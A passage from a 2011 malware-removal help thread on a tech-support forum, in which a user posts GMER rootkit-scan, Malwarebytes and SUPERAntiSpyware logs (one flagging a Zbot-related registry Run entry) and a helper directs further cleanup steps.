.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00080036 

.text           C:\Windows\system32\wuauclt.exe[4900] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 000B0000 

.text           C:\Windows\System32\svchost.exe[5112] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00040000 

.text           C:\Windows\System32\svchost.exe[5112] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 0004002C 

.text           C:\Windows\System32\svchost.exe[5112] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00040011 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00010F58 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00010F69 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 00010F3D 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 000100CA 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00010FA6 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00010025 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00010FDE 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00010F7A 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00010FC3 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00010065 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00010076 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00010054 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00010F8B 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 00010F22 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 0001000A 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00010FEF 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 000100B9 

.text           C:\Windows\System32\svchost.exe[5112] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 0006003F 

.text           C:\Windows\System32\svchost.exe[5112] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00060FB4 

.text           C:\Windows\System32\svchost.exe[5112] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 0006001D 

.text           C:\Windows\System32\svchost.exe[5112] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00060FEF 

.text           C:\Windows\System32\svchost.exe[5112] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 0006002E 

.text           C:\Windows\System32\svchost.exe[5112] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00060000 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00070F94 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00070FB9 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00070FEF 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00070036 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00070F79 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00070FCA 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 0007000A 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00070025 

.text           C:\Windows\System32\svchost.exe[5112] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 000C0FE5 



---- User IAT/EAT - GMER 1.0.15 ----



IAT             C:\Program Files\Common Files\McAfee\SystemCore\mfevtps.exe[1736] @ C:\Windows\system32\CRYPT32.dll [ADVAPI32.dll!RegQueryValueExW]  [00237740] C:\Program Files\Common Files\McAfee\SystemCore\mfevtps.exe (McAfee Process Validation Service/McAfee, Inc.)

IAT             C:\Program Files\Common Files\McAfee\SystemCore\mfevtps.exe[1736] @ C:\Windows\system32\CRYPT32.dll [KERNEL32.dll!LoadLibraryA]      [002377A0] C:\Program Files\Common Files\McAfee\SystemCore\mfevtps.exe (McAfee Process Validation Service/McAfee, Inc.)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdiplusShutdown]                                                [73F67817] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipCloneImage]                                                 [73FBA86D] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipDrawImageRectI]                                             [73F6BB22] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipSetInterpolationMode]                                       [73F5F695] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdiplusStartup]                                                 [73F675E9] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipCreateFromHDC]                                              [73F5E7CA] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipCreateBitmapFromStreamICM]                                  [73F98395] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipCreateBitmapFromStream]                                     [73F6DA60] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipGetImageHeight]                                             [73F5FFFA] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipGetImageWidth]                                              [73F5FF61] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipDisposeImage]                                               [73F571CF] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipLoadImageFromFileICM]                                       [73FECAE2] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipLoadImageFromFile]                                          [73F8C8D8] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipDeleteGraphics]                                             [73F5D968] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipFree]                                                       [73F56853] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipAlloc]                                                      [73F5687E] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipSetCompositingMode]                                         [73F62AD1] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)



---- Devices - GMER 1.0.15 ----



AttachedDevice  \FileSystem\Ntfs \Ntfs                                                                                                               mfehidk.sys (McAfee Link Driver/McAfee, Inc.)

AttachedDevice  \Driver\tdx \Device\Tcp                                                                                                              avgtdix.sys

AttachedDevice  \Driver\tdx \Device\Udp                                                                                                              avgtdix.sys

AttachedDevice  \Driver\tdx \Device\RawIp                                                                                                            avgtdix.sys

AttachedDevice  \FileSystem\fastfat \Fat                                                                                                             fltmgr.sys (Microsoft Filesystem Filter Manager/Microsoft Corporation)

AttachedDevice  \FileSystem\fastfat \Fat                                                                                                             mfehidk.sys (McAfee Link Driver/McAfee, Inc.)

AttachedDevice  \FileSystem\fastfat \Fat                                                                                                             AVGIDSFilter.Sys



---- EOF - GMER 1.0.15 ----





#5 cryptodan

Posted 01 July 2011 - 11:15 AM

Can you perform a complete scan with Malwarebytes?

#6 Neiltoo

Posted 01 July 2011 - 11:22 AM

Hi,
Do you mean a full scan? If so, I did. The log is immediately after the one for the quick scan above:

Malwarebytes' Anti-Malware 1.50.1.1100
www.malwarebytes.org

Database version: 6991

Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421

01/07/2011 11:19:11
mbam-log-2011-07-01 (11-19-11).txt

Scan type: Full scan (C:\|D:\|H:\|)
Objects scanned: 344237
Time elapsed: 1 hour(s), 45 minute(s), 58 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{485D2B40-06CC-D798-971D-E5570506DAD0} (Trojan.ZbotR.Gen) -> Value: {485D2B40-06CC-D798-971D-E5570506DAD0} -> Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)


Sorry, I'm not currently at the location of the problem PC, so I don't know if there is a difference between 'complete' and 'full'.

Cheers

Neil

#7 cryptodan

Posted 01 July 2011 - 11:31 AM

Try running Super Anti-Spyware in regular mode and not safe mode.

#8 Neiltoo

Posted 02 July 2011 - 06:07 AM

Super Anti-Spyware in regular mode as requested:

SUPERAntiSpyware Scan Log
http://www.superantispyware.com

Generated 07/02/2011 at 11:47 AM

Application Version : 4.55.1000

Core Rules Database Version : 7365
Trace Rules Database Version: 5177

Scan type : Complete Scan
Total Scan Time : 02:17:34

Memory items scanned : 820
Memory threats detected : 0
Registry items scanned : 9983
Registry threats detected : 0
File items scanned : 168853
File threats detected : 0



I also ran Malwarebytes again; the same infected item was found again despite having been quarantined and deleted after the last scan:

Malwarebytes' Anti-Malware 1.50.1.1100
www.malwarebytes.org

Database version: 6991

Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421

02/07/2011 12:02:26
mbam-log-2011-07-02 (12-02-25).txt

Scan type: Quick scan
Objects scanned: 175372
Time elapsed: 5 minute(s), 46 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{485D2B40-06CC-D798-971D-E5570506DAD0} (Trojan.ZbotR.Gen) -> Value: {485D2B40-06CC-D798-971D-E5570506DAD0} -> Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)



#9 cryptodan

Posted 02 July 2011 - 06:20 AM

Please follow the instructions in ==>This Guide<==.

Once the proper logs are created, then make a NEW TOPIC and post it ==>HERE<== Please include the link to this topic in your new topic and a description of your computer issues and what you have done to resolve them.

If you can produce at least some of the logs, then please create the new topic and explain what happens when you try to create the log(s) that you couldn't get. If you cannot produce any of the logs, then still post the topic and explain that you followed the Prep. Guide, were unable to create the logs, and describe what happens when you try to create the logs.

Once you have created the new topic, please reply back here with a link to the new topic.

#10 Neiltoo

Posted 02 July 2011 - 06:28 AM

Ok will do!
Should I run GMER again or will the log from yesterday's run suffice?
Thanks
Neil

Sorry stupid question!!

Edited by Neiltoo, 02 July 2011 - 06:48 AM.


#11 cryptodan

Posted 02 July 2011 - 01:22 PM

It should suffice.

#12 Neiltoo

Posted 05 July 2011 - 03:14 AM

New topic created:

http://www.bleepingcomputer.com/forums/topic407749.html



